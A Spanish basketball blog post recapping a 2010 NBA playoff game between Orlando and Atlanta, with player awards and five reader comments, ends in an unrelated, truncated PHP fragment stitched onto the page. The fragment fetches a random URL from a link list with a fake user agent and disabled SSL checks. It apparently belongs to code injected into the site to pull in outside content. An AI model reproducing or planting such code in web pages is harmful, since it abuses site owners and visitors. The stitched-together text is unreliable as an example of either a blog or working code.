Playoffs 06/05/2010: Renacimiento

07 de May de 2010 por TheDeerHunter

Empezó la serie con un partido de retraso. Los Hawks se desempolvaron el mal fario del otro día y salieron a cancha con ímpetu renovado. Al Horford se batió muy dignamente con Howard y con Jamal Crawford jugando muchos minutos de pseudo-base el equipo enseñó los dientes. Tanto el propio Crawford, como Josh Smith y Joe Johnson dieron todo por la victoria. El gran problema de Woodson es la escasez de efectivos. Con Bibby defenestrado (se comió un -18 en menos de un cuarto de hora que estuvo en pista), la plantilla se partió definitivamente por la mitad (5 tíos se repartieron 200 minutos y otros 5 apenas 40), hecho demoledor en el tramo final del choque.

Los Magic se vieron obligados a ponerse el mono de trabajo. No tanto Howard que estuvo titánico. Sólo 3 hombres en 40 años, antes que él anoche, habían logrado un 25-18 con un 85% en tiro en un partido de Playoffs. Shaq, Unseld y Chamberlain, para que nos hagamos una idea de con quién se codea este tío. Durante los primeros períodos también estaban bien Lewis y Nelson con aportaciones puntuales de Pietrus pero no era suficiente para desatascar el partido.

Y en eso, apareció Vince Carter en el último cuarto, con destellos de la grandeza que antaño poseía. Apareció como la 2ª (o incluso primera) espada que estaba llamado a ser en este equipo y les endosaron a los Hawks un parcial de 19-2 que terminó con las esperanzas de Atlanta por rascar algo antes de volver a casa. Magnífico partido.

Un último apunte. No os perdáis el show que monta Howard antes de empezar el partido imitando a otros… Pedazo de crack.

PREMIOS

MVP: Ha quedado todo dicho. Dwight Howard, 25 puntos, 18 rebotes y 85% en lanzamientos de campo.

Sorpresa: Ese último cuarto de Vince Carter nos ha traído a la memoria grandes recuerdos. 11 puntos con un solo fallo en un tiro a canasta. Para esto lo ficharon.

Decepción: Mike Bibby se ha convertido en un lastre para su equipo. Como resultado, tan solo 14 minutos jugados con 3 puntos, 1 asistencia y Orlando haciendo el agosto.

Esfuerzo en vano: Al Horford se batió el cobre con Dwight Howard y a pesar de los números del de los Magic no lo hizo del todo mal. Además, él aportó 24 puntos y 10 rebotes.

Y MAÑANA…

Ahora cualquier partido es a vida o muerte. Los Spurs llegan al Alamo con un 2-0 en contra y sin poder permitirse ningún tropiezo. Bien harían de ganar de forma clara su partido para seguir teniendo opciones en la eliminatoria. Y en Boston, un herido Lebron James se ha de levantar para seguir plantando cara. Cuidadito, que hay rumores que apuntan a que su lesión en el codo es más grave de lo que parece.

Comenta

5 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Lo primero de todo viendo el vídeo de Howard me acaba de ganar para la causa, quiero que eliminen a los Cavs sí o sí en caso que lleguen. De todas formas menudo sentido del espectáculo tienen los americanos. En España lo hace uno del Barça sobre otro del Madrid o viceversa y estamos hablando de provocaciones, generación de violencia, …

    Creo que la serie no tiene color o no debería tenerlo, tal vez ATL puede ganar un partido pero lo veo complicado.

    Enhorabuena por el análisis del post anterior, y sobre todo por el blog, de veras lo hacéis muy bien, tal vez demasíado bien y nos tenéis muy mal acostumbrados.

    Un saudo

      Citar

  2. Love Denise dice:
    #2

    Hoy no he podido ver el partido, pero viendo el resumen y las estadísticas, parece que Bibby ha estado igual de horrible o más que en el 1er partido donde fue un autentico colador; aunque los Hawks han estado relativamente bien, aguantando hasta el 3er cuarto.
    No me gustan las payasadas de James y mucho menos que Howard las imite.

      Citar

  3. pcerezo dice:
    #3

    Yo creo que hay que tener un sentido más lúdico del juego y no ser tan purista Love Denise. Me parece que las payasadas de Lebron menospreciando al contrario si son reprochables lo demás me parece que tiene cabida en el propio espectáculo.

      Citar

  4. Love Denise dice:
    #4

    aunque parezca contradictorio, a mi cuando Lebron menosprecia al contrario, me da igual, es más, cuando más sucio, bronco y con piques sea el partido, más me gusta, porque los jugadores sacan su orgullo y hay más intensidad, más garra, y se lucha por cualquier balón.., pero el númerito del magnesio ese sí que personalmente no lo soporto

      Citar

  5. LEmontus dice:
    #5

    A mi me parecen bien las payasadas además solo los jugones las hacen. En cuanto al partido que me gusta pietrus, y que equipazo y que gusto da ver jugar a howard y sus colegas xD, por cierto buen dia desde la linea de libres para el segundo mejor pivot de la nba.

    Hay que ver que marronero es barnes es buen jugador y una marronero, me encanta. Cavs y magic mandan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>